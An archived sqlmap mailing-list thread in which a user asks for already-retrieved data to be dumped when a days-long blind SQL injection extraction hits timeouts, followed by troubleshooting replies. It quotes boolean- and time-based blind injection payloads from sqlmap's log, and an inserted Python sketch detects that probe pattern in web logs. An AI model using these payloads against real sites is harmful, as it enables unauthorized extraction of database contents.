[09:54:15] [PAYLOAD] 2885) AND ORD(MID((SELECT IFNULL(CAST(CHAR_LENGTH(<row>) AS CHAR),0x20) FROM <db>.<table> ORDER BY id LIMIT 21,1),1,1))>48 AND (7548=7548
[09:54:15] [PAYLOAD] 2885) AND ORD(MID((SELECT IFNULL(CAST(CHAR_LENGTH(<row>) AS CHAR),0x20) FROM <db>.<table> ORDER BY id LIMIT 21,1),1,1))>1 AND (7548=7548
[09:54:16] [PAYLOAD] 2885) AND ORD(MID((SELECT IFNULL(CAST(CHAR_LENGTH(<row>) AS CHAR),0x20) FROM <db>.<table> ORDER BY id LIMIT 21,1),1,1))>47 AND (7548=7548
[09:54:16] [PAYLOAD] 2885) AND ORD(MID((SELECT IFNULL(CAST(CHAR_LENGTH(<row>) AS CHAR),0x20) FROM <db>.<table> ORDER BY id LIMIT 21,1),2,1))>51 AND (7548=7548
[09:54:16] [PAYLOAD] 2885) AND ORD(MID((SELECT IFNULL(CAST(CHAR_LENGTH(<row>) AS CHAR),0x20) FROM <db>.<table> ORDER BY id LIMIT 21,1),2,1))>48 AND (7548=7548
[09:54:17] [PAYLOAD] 2885) AND ORD(MID((SELECT IFNULL(CAST(CHAR_LENGTH(<row>) AS CHAR),0x20) FROM <db>.<table> ORDER BY id LIMIT 21,1),2,1))>1 AND (7548=7548
[09:54:17] [INFO] retrieved: 0
[09:54:17] [DEBUG] performed 7 queries in 2.11 seconds
[09:54:17] [DEBUG] performed 0 queries in 2.12 seconds
[09:54:17] [PAYLOAD] 2885) AND 6853=IF((ORD(MID((SELECT IFNULL(CAST(<row> AS CHAR),0x20) FROM <db>.<table> ORDER BY id LIMIT 21,1),1,1))>64),SLEEP(5),6853) AND (5650=5650
[09:54:19] [PAYLOAD] 2885) AND 6853=IF((ORD(MID((SELECT IFNULL(CAST(<row> AS CHAR),0x20) FROM <db>.<table> ORDER BY id LIMIT 21,1),1,1))>32),SLEEP(5),6853) AND (5650=5650
[09:54:19] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[09:54:20] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[09:54:21] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[09:54:22] [INFO] fetching columns for table <table> in database <db>
[09:54:22] [PAYLOAD] 2885) AND ORD(MID((SELECT IFNULL(CAST(COUNT(column_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=<hexstr1> AND table_schema=<hexstr2>),1,1))>51 AND (1291=1291
[09:54:22] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[09:54:23] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[09:54:24] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[09:54:25] [CRITICAL] unable to connect to the target URL or proxy
[09:54:25] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 36 times, 503 (Service Unavailable) - 2 times

[*] shutting down at 09:54:25

I won't be able to reproduce it, sorry. ;-/ My point is a feature request: if an error condition occurs, sqlmap should better dump immediately the data it already retrieved, in csv format.

Cheers,

Dirk

PS: I didn't modify any timeout or retry values, so normally I would expect sqlmap at least 3x30 seconds before bail out, correct?
|
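Seen from the server side, the [PAYLOAD] lines in the message above give blind extraction a recognisable shape in request logs: one subquery repeated while only the character position and the comparison threshold change. The following detection sketch is an added example, not part of the original post and not sqlmap code; the access-log layout, the /item.php path, the client addresses and all function names are assumptions, and the sample lines are constructed from the payload shapes quoted in the message.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qsl, quote_plus, urlsplit

# One inference probe as it appears in the thread's log:
#   ORD(MID((<subquery>),<position>,1))><threshold>
PROBE = re.compile(
    r"ORD\(MID\(\((?P<sub>.+?)\),(?P<pos>\d+),1\)\)>(?P<thr>\d+)", re.I | re.S)
DELAY = re.compile(r"\bSLEEP\(\d+\)", re.I)
# Assumed log layout: <client> [<timestamp>] "<METHOD> <target> HTTP/x.y" <status>
REQUEST = re.compile(r'^(?P<ip>\S+) \[[^\]]*\] "(?:GET|POST) (?P<target>\S+) HTTP')


def probes_in(line):
    """Yield (client, template, position, threshold, timed) per probe found."""
    m = REQUEST.match(line)
    if not m:
        return
    query = urlsplit(m.group("target")).query
    for _name, value in parse_qsl(query, keep_blank_values=True):
        for p in PROBE.finditer(value):
            # Row offsets (LIMIT 21,1) change from row to row; mask plain
            # integers so every row of one extraction lands in one group.
            template = re.sub(r"\b\d+\b", "N", p.group("sub"))
            yield (m.group("ip"), template, int(p.group("pos")),
                   int(p.group("thr")), bool(DELAY.search(value)))


def detect(lines):
    """Group probes by client and subquery template, largest group first."""
    groups = defaultdict(list)
    for line in lines:
        for ip, template, pos, thr, timed in probes_in(line):
            groups[(ip, template)].append((pos, thr, timed))
    findings = []
    for (ip, template), hits in groups.items():
        per_pos = defaultdict(set)
        for pos, thr, _timed in hits:
            per_pos[pos].add(thr)
        findings.append({
            "client": ip,
            "template": template,
            "probes": len(hits),
            "positions": sorted(per_pos),
            "technique": "time" if any(h[2] for h in hits) else "boolean",
            # Several thresholds tried against one character position is the
            # bisection loop itself, not a single odd request.
            "bisecting": any(len(s) >= 3 for s in per_pos.values()),
        })
    return sorted(findings, key=lambda f: -f["probes"])


# --- Constructed sample input (shapes taken from the log in the message) ---
def _line(ip, ts, value):
    return '%s [14/Jul/2014:%s +0000] "GET /item.php?id=%s HTTP/1.1" 200' % (
        ip, ts, quote_plus(value))


LENGTH_Q = ("SELECT IFNULL(CAST(CHAR_LENGTH(<row>) AS CHAR),0x20) "
            "FROM <db>.<table> ORDER BY id LIMIT 21,1")
DATA_Q = ("SELECT IFNULL(CAST(<row> AS CHAR),0x20) "
          "FROM <db>.<table> ORDER BY id LIMIT 21,1")

SAMPLE = [_line("192.0.2.10", "09:54:14", "417")]
SAMPLE += [
    _line("198.51.100.23", "09:54:15",
          "2885) AND ORD(MID((%s),%d,1))>%d AND (7548=7548" % (LENGTH_Q, pos, thr))
    for pos, thr in [(1, 51), (1, 48), (1, 1), (1, 47), (2, 51), (2, 48), (2, 1)]
]
SAMPLE += [
    _line("198.51.100.23", "09:54:17",
          "2885) AND 6853=IF((ORD(MID((%s),1,1))>%d),SLEEP(5),6853) AND (5650=5650"
          % (DATA_Q, thr))
    for thr in (64, 32)
]

if __name__ == "__main__":
    for f in detect(SAMPLE):
        print(f["client"], f["technique"], f["probes"], f["positions"],
              "bisecting" if f["bisecting"] else "few probes", f["template"])
```

A single match of the probe pattern in a request parameter is already worth an alert; the grouping adds how far the extraction got and whether the delay-based variant was used.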
From: Miroslav S. <mir...@gm...> - 2014-07-14 18:56:45
|
Hi Dirk.

sqlmap doesn't retrieve already retrieved data. It stores them into the local session data for later (re)usage.

"boolean-based blind vulnerability and I tried to retrieve a few tables with big chunks of data" -> I would expect your problem in union SQLI, but not boolean-based blind.

Please make sure that:
1) you are running the latest revision from our GitHub repository
2) that target is not having some kind of WAF protection mechanism that does the hard drop of requests

As said, I don't see a reason why sqlmap would fail here. It would be great if you could isolate "problematic" payload with usage of -v 3 and try it inside the browser (to see what's happening)

Kind regards,
Miroslav Stampar

--
Miroslav Stampar
http://about.me/stamparm
|
From: Dirk W. <sp...@dr...> - 2014-07-14 10:37:13
|
Hi Sharma,

On 07/14/2014 12:06 PM, Sharma, Vivek wrote:
> Hi Dirk,
>
> Try adding --authorization header to the cmd options. It worked for me as well. I was having the same issue as well.

thx but my problem was a network timeout.

Next time I will increase the timeout and retry value but still I thought it would be great in general if sqlmap would dump the already retrieved data if a problem similar to mine occurs.

Cheers, Dirk
|
From: Sharma, V. <viv...@bl...> - 2014-07-14 10:06:37
|
Hi Dirk,

Try adding --authorization header to the cmd options. It worked for me as well. I was having the same issue as well.

Regards
Vivek Sharma
|
From: Dirk W. <sp...@dr...> - 2014-07-14 09:55:25
|
Hi,

sorry if I missed something but wouldn't it make sense to dump already retrieved data if sqlmap is encountering a timeout beyond the specified/ default value?

[09:54:19] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[09:54:20] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[09:54:21] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[09:54:22] [CRITICAL] connection exception detected in dumping phase: 'unable to connect to the target URL or proxy'
[..2 lines of private output omitted...]
[09:54:22] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[09:54:23] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[09:54:24] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[09:54:25] [CRITICAL] unable to connect to the target URL or proxy
[09:54:25] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 36 times, 503 (Service Unavailable) - 2 times

[*] shutting down at 09:54:25

My specific case was a boolean-based blind vulnerability and I tried to retrieve a few tables with big chunks of data. It was running for >2 days already.

Cheers,

Dirk
|
From: Miroslav S. <mir...@gm...> - 2014-07-11 14:27:53
|
Hi Alex.

This looks like you had some disk IO issue. Are you able to reproduce this?

Kind regards,
Miroslav Stampar

On Fri, Jul 11, 2014 at 3:46 AM, Alex Gerth <ger...@gm...> wrote:
> sqlmap version: 1.0-dev
> Python version: 2.7.3
> Operating system: posix
> Command line: ./sqlmap -u **************************************** --dbs
> Technique: None
> Back-end DBMS: None (identified)
> Traceback (most recent call last):
>   File "./sqlmap", line 95, in main
>     start()
>   File "/usr/share/sqlmap/lib/controller/controller.py", line 364, in start
>     if not checkConnection(suppressOutput=conf.forms) or not checkString() or not checkRegexp():
>   File "/usr/share/sqlmap/lib/controller/checks.py", line 1213, in checkConnection
>     page, _ = Request.queryPage(content=True, noteResponseTime=False)
>   File "/usr/share/sqlmap/lib/request/connect.py", line 894, in queryPage
>     page, headers, code = Connect.getPage(url=uri, get=get, post=post, cookie=cookie, ua=ua, referer=referer, host=host, silent=silent, method=method, auxHeaders=auxHeaders, response=response, raise404=raise404, ignoreTimeout=timeBasedCompare)
>   File "/usr/share/sqlmap/lib/request/connect.py", line 573, in getPage
>     processResponse(page, responseHeaders)
>   File "/usr/share/sqlmap/lib/request/basic.py", line 303, in processResponse
>     parseResponse(page, responseHeaders if kb.processResponseCounter < PARSE_HEADERS_LIMIT else None)
>   File "/usr/share/sqlmap/lib/request/basic.py", line 122, in parseResponse
>     headersParser(headers)
>   File "/usr/share/sqlmap/lib/parse/headers.py", line 43, in headersParser
>     parseXmlFile(xmlfile, handler)
>   File "/usr/share/sqlmap/lib/core/common.py", line 1672, in parseXmlFile
>     with contextlib.closing(StringIO(readCachedFileContent(xmlFile))) as stream:
>   File "/usr/share/sqlmap/lib/core/common.py", line 1728, in readCachedFileContent
>     kb.cache.content[filename] = f.read()
>   File "/usr/lib/python2.7/codecs.py", line 671, in read
>     return self.reader.read(size)
>   File "/usr/lib/python2.7/codecs.py", line 471, in read
>     newdata = self.stream.read()
> IOError: [Errno 5] Input/output error

--
Miroslav Stampar
http://about.me/stamparm
|